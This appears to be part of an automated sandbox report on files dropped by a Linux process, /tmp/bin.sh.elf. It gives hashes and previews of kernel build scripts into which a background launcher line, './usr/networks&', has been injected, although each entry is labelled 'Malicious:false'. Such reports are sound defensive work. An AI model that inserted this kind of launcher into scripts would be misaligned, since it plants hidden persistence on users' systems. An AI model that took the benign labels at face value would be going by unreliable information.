                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):292
                                                                  Entropy (8bit):3.90905274301989
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVxpjUvwcG6IYlfkoeOPeQxS8LXEVvXFNK/5e9o4TLZFwqwXF6HF/qHF7VvMTc2:apovwTMldPzMvHK/5u3rHoHjUAEPTn
                                                                  MD5:543D5DBC6E85559159F104129FF1BF1F
                                                                  SHA1:324751DF3B652BC8C71B68222D94E6A74C27B1B1
                                                                  SHA-256:97ABE3A808380B11D216A3484E4156BFA5336031DD00A76307C2987585FBFF77
                                                                  SHA-512:880C67C68ED1AB3436653F636294C1FCD3F70EE82C66529E99D95D1428902417FD2053093CE5D047088AE26B45822D39BFDC9AFFC9CC14FBC61C81DFBA96E59A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1. fi...if [ -n "$entry" ]; then. if [ -z "$compat" ]; then. echo "NATIVE($nr, $entry)". else. echo "COMPAT($nr, $entry, $compat)". fi. fi. done.) > "$out"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):716
                                                                  Entropy (8bit):5.188740504939567
                                                                  Encrypted:false
                                                                  SSDEEP:12:cngowa2h12l3mGXHFMyHFtfBjCksL49ysL7FwuIG7n:M4+XKyrZPsL4QsL7FwuIc
                                                                  MD5:E233F7425841D915F481DD78C9518D4D
                                                                  SHA1:68CF549CF969E9786FF3BCECA2C5976C678C2358
                                                                  SHA-256:FD438227D3E0DD70A5FE641C67B5F8148482357EFAE725A542EA930EA3E95C30
                                                                  SHA-512:4F99D3541DFD43BB317020AA734A91FB4712D817716C5F3F0774BDDB05D2393EB04391AD5DE0A27F6F904BFCF3BC7BD551481F2F138956A745DD5FE23F1DCFFA
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "Image.gz" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):524
                                                                  Entropy (8bit):5.2190434920010835
                                                                  Encrypted:false
                                                                  SSDEEP:12:cngowa2h12l3mGnHFMyHFt9n2M2V/b3PDn:M4+nKyr92M2lX
                                                                  MD5:F01984516C5B822703949B83099EB130
                                                                  SHA1:9DD176221BE72554D4BC5D6429573CD0645F7BF1
                                                                  SHA-256:8B89A8B5AE4238923E1CA2F2444F346497D9C48FC70ED722623FDA77255D5877
                                                                  SHA-512:D5B60235FD7D6FC3E2EB8D84AED27679625F47DDFA86CC7EFC94E6AADB5D61775ECDA78D33C972783590A55A6B27BD8E453F685F911EBDA06A95105CCC999177
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map..sync../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1013
                                                                  Entropy (8bit):4.980378985367638
                                                                  Encrypted:false
                                                                  SSDEEP:24:OU6oYRFZSo7Zm5Ddv8y8bULN4ty/Mf4ikCB57SQj8X4:+zR3YddX8bUB4s+6CUM+4
                                                                  MD5:7066B68ACB7D6AA34D784436E376FE3A
                                                                  SHA1:E2A329E97BD265AEE872457C3A68466FEA9E30FE
                                                                  SHA-256:51F3DFFB7DCF3DFC8A3446165E3A3F97027B09BDE97F7F93BBCD7F8C45AABA3F
                                                                  SHA-512:7BF04CD7FB7DBA2D836D8EB31252496AA37375C0C6363426283610451B3D709CC1C01339E8D754666823AB2161ABFF5C5E918A8E03910C5E723E607D96CE2C36
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..# is not found then the subshell will exit with code 1, and we'll..# continue on to the next board...grep -E '^# require ' "${board_cfg}" | \.. cut -d' ' -f 3- | \.. while read req; do...case ${req} in...*=y)....# If we require something =y then we check that a line....# containing it is present in the reference config.....grep -Eq "^${req}\$" "${ref_cfg}" && continue....;;...*=n)....# If we require something =n then we just invert that....# check, considering the requirement met if there isn't....# a line containing the value =y in the reference....# config.....grep -Eq "^${req/%=n/=y}\$" "${ref_cfg}" || continue....;;...*)....echo "WARNING: Unhandled requirement '${req}'"....;;...esac....[ ${print_skipped} -eq 1 ] && echo "Skipping ${board_cfg}"...exit 1..done || continue...# Merge this board config fragment into our final config file..${srctree}/scripts/kconfig/merge_config.sh \...-m -O ${objtree} ${cfg} ${board_cfg} \...| grep -Ev '^(#|Using)'.done../usr/netw
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):524
                                                                  Entropy (8bit):5.2190434920010835
                                                                  Encrypted:false
                                                                  SSDEEP:12:cngowa2h12l3mGnHFMyHFt9n2M2V/b3PDn:M4+nKyr92M2lX
                                                                  MD5:F01984516C5B822703949B83099EB130
                                                                  SHA1:9DD176221BE72554D4BC5D6429573CD0645F7BF1
                                                                  SHA-256:8B89A8B5AE4238923E1CA2F2444F346497D9C48FC70ED722623FDA77255D5877
                                                                  SHA-512:D5B60235FD7D6FC3E2EB8D84AED27679625F47DDFA86CC7EFC94E6AADB5D61775ECDA78D33C972783590A55A6B27BD8E453F685F911EBDA06A95105CCC999177
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map..sync../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):777
                                                                  Entropy (8bit):5.181427208784543
                                                                  Encrypted:false
                                                                  SSDEEP:12:cngowa2hA42l3mGsPzaHFMaHFt02BkcCZsL49ysL7FwuIG7n:M4wsPzaKar00RCZsL4QsL7FwuIc
                                                                  MD5:448535F84AA5B4CAF079F69C4D491EA2
                                                                  SHA1:F4BCEBECCC6AA1841C78F1783191655E2A76340E
                                                                  SHA-256:B992FF78499EC3BB631F7746FBD2CCC8FC192A322EE9BB1D2113F3DDE83D81BF
                                                                  SHA-512:C23AE1337A6C387F0CB69C9159BF5828B742F8D1FC29CCF320CD87F19650531B398143710A7A8CAA45845C87FD4651653F115BAD4D88ED7D3F6E81D1C472A0F7
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist..verify "$2".verify "$3"..# User may have a custom install script..if [ -n "${INSTALLKERNEL}" ]; then. if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi. if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi.fi..# Default install..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):778
                                                                  Entropy (8bit):5.180114046612086
                                                                  Encrypted:false
                                                                  SSDEEP:12:cngowa2hA42l3mGsPzaHFMaHFt02BkcCZsL49ysL7FwuIGTn:M4wsPzaKar00RCZsL4QsL7FwuIK
                                                                  MD5:FAE5274E36F391AA1552A80ADE42164D
                                                                  SHA1:A28F085E263CC5A91CBE11543B8075467C2C1351
                                                                  SHA-256:0AF4573794FA7AF09FA3A0CD808D2741973B646D1AAD18D3CE8188E85CD68655
                                                                  SHA-512:9AAA1A6F202071879DDAA032BFB03E1B663C2A6C3ADAAA1B7109C603B1F380C48A9D7D17FA8CA0E009DA427A9596FA4A47DB844022CBF227A919C491B9FDAD7E
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist..verify "$2".verify "$3"..# User may have a custom install script..if [ -n "${INSTALLKERNEL}" ]; then. if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi. if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi.fi..# Default install..if [ "$(basename $2)" = "zImage" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1.../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):51
                                                                  Entropy (8bit):4.137824116354036
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORk33g0VOORgn:HA7n
                                                                  MD5:7DD33E5C2454D655FD681039B5DEB4EE
                                                                  SHA1:9618B85AD954925D61B4AAB7A6A83CB02A5F1BD2
                                                                  SHA-256:4235524DE1D4B7DC6B802D9E371A65F9DB24647A3B62D5BEDE0C122405FC8FD1
                                                                  SHA-512:A0AC5DDE47E2716BAC26F2868BF5195179657D94E7158CE5BF353F6877B277C6E78A547F4253562467904B89F12A61226F0A7BDE245A908EAC314014EBD4D1BA
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit $ERROR../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):269
                                                                  Entropy (8bit):4.8822799035917495
                                                                  Encrypted:false
                                                                  SSDEEP:6:ch+6yV6DoxC0ld8FxsIEYNkvqcl5gsfFmvGqBGJnn6yZrIOC6Pn:ch/PsxCc+qYtclxfQJYgwPn
                                                                  MD5:EA02BAC09855DFCE9A7F5A6EAB955ECB
                                                                  SHA1:C0747E33E635087BB7925771BC2AA68D8A1CC100
                                                                  SHA-256:A6A8FAEAC216D55F14C091C5ACBF953A1110B0BFC69F6772A57C7A04756D940E
                                                                  SHA-512:1E7B813ABAC13989C729AA9E1611BC7E5346B52C9ED7E5DC014F048B5FB39618FBE0D398F31836012BD5B057E05125E7E8AD32956BC51914037C73AD346C32EB
                                                                  Malicious:false
                                                                  Preview:./usr/networks&....exit(1);...}...num = -1;.# Ignore the rest of the file..}..{...if (num == -1) next;...if (($1 != -1) && ($1 != num)) {....printf "Error: Syscall %s out of order (expected %s)\n",.....$1, num;....exit(1);...};...num++;..}' "$1"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):58
                                                                  Entropy (8bit):3.8859027122378516
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVxJjUvfvKDlOORgn:aJovHK4n
                                                                  MD5:A73EAA64A7F7396DC86EEE96772F5CAD
                                                                  SHA1:F496C2203BEF6CF66500070F1F106A6DE84ED2C0
                                                                  SHA-256:5304A36BE867369941B7CA90AFA619ADB7D761CB1A38D520B403E2E8A8FDDE39
                                                                  SHA-512:AA605A73179060C352A0F366733C9477F60A8CBB4108AFAA555C787526C4B62A359A37DD08E30F68F8AE634A9A20082E1DC6D36081E7C3B12DADAD626AA7F73F
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1..exit 0../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1374
                                                                  Entropy (8bit):5.049143893926127
                                                                  Encrypted:false
                                                                  SSDEEP:24:rUxDXOUwPQCwVsoKNSruNlVQbhYsph0taGOl53jNadNQFOXgh0taGOlK:rUF+NPfwVs2rMVQbWMjZlJ1FOCjZlK
                                                                  MD5:F0C24F2801E658FF3A01A33E26EA7682
                                                                  SHA1:27934B831C1B88A8F9D44E91CC189CA4AD72017C
                                                                  SHA-256:6202A59E4AAE5585804E49A01828E70FED9614D7361BA6CD66E2214C97E5E096
                                                                  SHA-512:48BA3A398680810E72E386A8D3882791B1AF3DB2C719CB06ADBDF1AE23E9785AE6B9F199127BA65C1361B91CDE77742903CCD1DE3B806FB6CDB25CA1642C187A
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# Have Kbuild supply the path to nm so we handle cross compilation..nm="$1".vmlinux="$2"..# gcc-4.6-era toolchain make _stext an A (absolute) symbol rather than T.$nm "$vmlinux" | grep -e " [TA] _stext$" -e " t start_first_256B$" -e " a text_start$" -e " t start_text$" -m4 > .tmp_symbols.txt...vma=$(cat .tmp_symbols.txt | grep -e " [TA] _stext$" | cut -d' ' -f1)..expected_start_head_addr=$vma..start_head_addr=$(cat .tmp_symbols.txt | grep " t start_first_256B$" | cut -d' ' -f1)..if [ "$start_head_addr" != "$expected_start_head_addr" ]; then..echo "ERROR: head code starts at $start_head_addr, should be $expected_start_head_addr"..echo "ERROR: try to enable LD_HEAD_STUB_CATCH config option"..echo "ERROR: see comments in arch/powerpc/tools/head_check.sh"...exit 1.fi..top_vma=$(echo $vma | cut -d'0' -f1)..expected_start_text_addr=$(cat .tmp_symbols.txt | grep " a text_start$" | cut -d' ' -f1 | sed "s/^0/$top_vma/")..start_text_addr=$(cat .tmp_symbols.txt | grep
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1338
                                                                  Entropy (8bit):5.413049078573915
                                                                  Encrypted:false
                                                                  SSDEEP:24:rUaqf4HZd6VUZD74+jhoCRlpBmafh4MKgQ5Ipxa/Smxan6J+WmpE:rUaqf4HCVk7+CRlpfh4M3QqpQ/zxa6JN
                                                                  MD5:616785607E8CA9E920649194171B6910
                                                                  SHA1:00FAD3EA514561388B1A1BC2972E1EC817C2A518
                                                                  SHA-256:E43189451F97664D57D2D137231EFD4B8F1E831E8B0656C51D21C8670314F9DA
                                                                  SHA-512:6903D18350AAD87A5E1AC0D9B9BF5DC94369A56B826BB49FF23B2EF4418CF0E142D30413ED3737770B1B8A38967DF5CDC266300D41D562EE1F770EEC26E890FD
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..# Have Kbuild supply the path to objdump and nm so we handle cross compilation..objdump="$1".nm="$2".vmlinux="$3"..# Remove from the bad relocations those that match an undefined weak symbol.# which will result in an absolute relocation to 0..# Weak unresolved symbols are of that form in nm output:.# " w _binary__btf_vmlinux_bin_end".undef_weak_symbols=$($nm "$vmlinux" | awk '$1 ~ /w/ { print $2 }')..bad_relocs=$(.$objdump -R "$vmlinux" |..# Only look at relocation lines...grep -E '\<R_' |..# These relocations are okay..# On PPC64:..#.R_PPC64_RELATIVE, R_PPC64_NONE..# On PPC:..#.R_PPC_RELATIVE, R_PPC_ADDR16_HI,..#.R_PPC_ADDR16_HA,R_PPC_ADDR16_LO,..#.R_PPC_NONE..grep -F -w -v 'R_PPC64_RELATIVE.R_PPC64_NONE.R_PPC_ADDR16_LO.R_PPC_ADDR16_HI.R_PPC_ADDR16_HA.R_PPC_RELATIVE.R_PPC_NONE' |..([ "$undef_weak_symbols" ] && grep -F -w -v "$undef_weak_symbols" || cat).)..if [ -z "$bad_relocs" ]; then..exit 0.fi..num_bad=$(echo "$bad_relocs" | wc -l).echo
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):50
                                                                  Entropy (8bit):4.03572875064339
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVaBQSXVOORgn:wSMn
                                                                  MD5:804DDBE985C6034E697B31A2C2B0135D
                                                                  SHA1:8E947C859C562B20CF6FF00522349EC43E7C6F8B
                                                                  SHA-256:D358BBDC7C1B9747D321DEEA37D1E83946CD7D046050021A84FAAB17A65A6892
                                                                  SHA-512:A355120B8241DE555E782E07745446BD5970905F9ED645D896E8BA17348EE44216F715BF79A1A228FEB0FAECAC3CC06B26BC0A6745DD385782BADFBFC9769D00
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 0.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):716
                                                                  Entropy (8bit):5.188740504939567
                                                                  Encrypted:false
                                                                  SSDEEP:12:cngowa2h12l3mGXHFMyHFtfBjCksL49ysL7FwuIG7n:M4+XKyrZPsL4QsL7FwuIc
                                                                  MD5:E233F7425841D915F481DD78C9518D4D
                                                                  SHA1:68CF549CF969E9786FF3BCECA2C5976C678C2358
                                                                  SHA-256:FD438227D3E0DD70A5FE641C67B5F8148482357EFAE725A542EA930EA3E95C30
                                                                  SHA-512:4F99D3541DFD43BB317020AA734A91FB4712D817716C5F3F0774BDDB05D2393EB04391AD5DE0A27F6F904BFCF3BC7BD551481F2F138956A745DD5FE23F1DCFFA
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script.if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..if [ "$(basename $2)" = "Image.gz" ]; then.# Compressed install. echo "Installing compressed kernel". base=vmlinuz.else.# Normal install. echo "Installing normal kernel". base=vmlinux.fi..if [ -f $4/$base-$1 ]; then. mv $4/$base-$1 $4/$base-$1.old.fi.cat $2 > $4/$base-$1..# Install system map file.if [ -f $4/System.map-$1 ]; then. mv $4/System.map-$1 $4/System.map-$1.old.fi.cp $3 $4/System.map-$1../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):518
                                                                  Entropy (8bit):5.221872442078692
                                                                  Encrypted:false
                                                                  SSDEEP:12:cngowa2h12l3mGnHFMyHFt9n2M2V/b3P2n:M4+nKyr92M2lS
                                                                  MD5:69819922FB9DBF095FA1F4AC01F6B37C
                                                                  SHA1:C2A5FD4AE7B020D453173D20306EF002AA69CDAA
                                                                  SHA-256:571C340D1F044789BC98AE272312D0A3B477520A10DD292F4B8F572D95362772
                                                                  SHA-512:33C4A288C00BEEDD6C558412977FFA9D0EDD2D24FC3868F5AEB80BBEECE90C34D86FA5153417BD5E1FD19B36E0BEAB93552769EB7219AE071A919B6A20474E10
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 1..fi.}..# Make sure the files actually exist.verify "$2".verify "$3"..# User may have a custom install script..if [ -x ~/bin/${INSTALLKERNEL} ]; then exec ~/bin/${INSTALLKERNEL} "$@"; fi.if [ -x /sbin/${INSTALLKERNEL} ]; then exec /sbin/${INSTALLKERNEL} "$@"; fi..# Default install - same as make zlilo..if [ -f $4/vmlinuz ]; then..mv $4/vmlinuz $4/vmlinuz.old.fi..if [ -f $4/System.map ]; then..mv $4/System.map $4/System.old.fi..cat $2 > $4/vmlinuz.cp $3 $4/System.map../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):115
                                                                  Entropy (8bit):4.352261167967631
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVxJjVvqJehDIAtQhLMWZKeKeBHvrjUv6viXVOORgn:aJQJRAiBIeHTov6viMn
                                                                  MD5:CF0DF14B2542B49CC430815F52210FB2
                                                                  SHA1:57F85D438B7B483317A0369336E7FAE77F416B94
                                                                  SHA-256:AE1F21EF3B288AC922174882D038556FC6FFAA23B297ACE426CC43F610978757
                                                                  SHA-512:3A844C13254D17FC86BA21CF13F63EDF3EF081520C2A5BFDD77DAED6B3CB3B022730A391F481D4C4B315A7152C7E36A2357F4A6A426813ADDA0FE3E249947913
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 0.else. echo "$file: undefined symbols found" >&2. exit 1.fi../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2150
                                                                  Entropy (8bit):5.468486256940274
                                                                  Encrypted:false
                                                                  SSDEEP:48:M3ZRGLswqELBfggjXbtANxNxMxdvKYzE8cY:qZREswqmBYOIMxdTE8cY
                                                                  MD5:31D41F5211924C4632BC4C2C647F86C8
                                                                  SHA1:FB13A405867C03FE24A3BDF261EBAC76696C3A1C
                                                                  SHA-256:CC8883B933D76F68E02C2DC72A69081826AFD29546AB4D670F59B5261D5BCC7D
                                                                  SHA-512:D8754FA4D1EFEC8C9E04A9956B8DBB34052EEE4609FF58B05A83048351236EF3A1FA2B10052E16B203159044A681A60E0F28B69158159506FAC60F1855DDA006
                                                                  Malicious:false
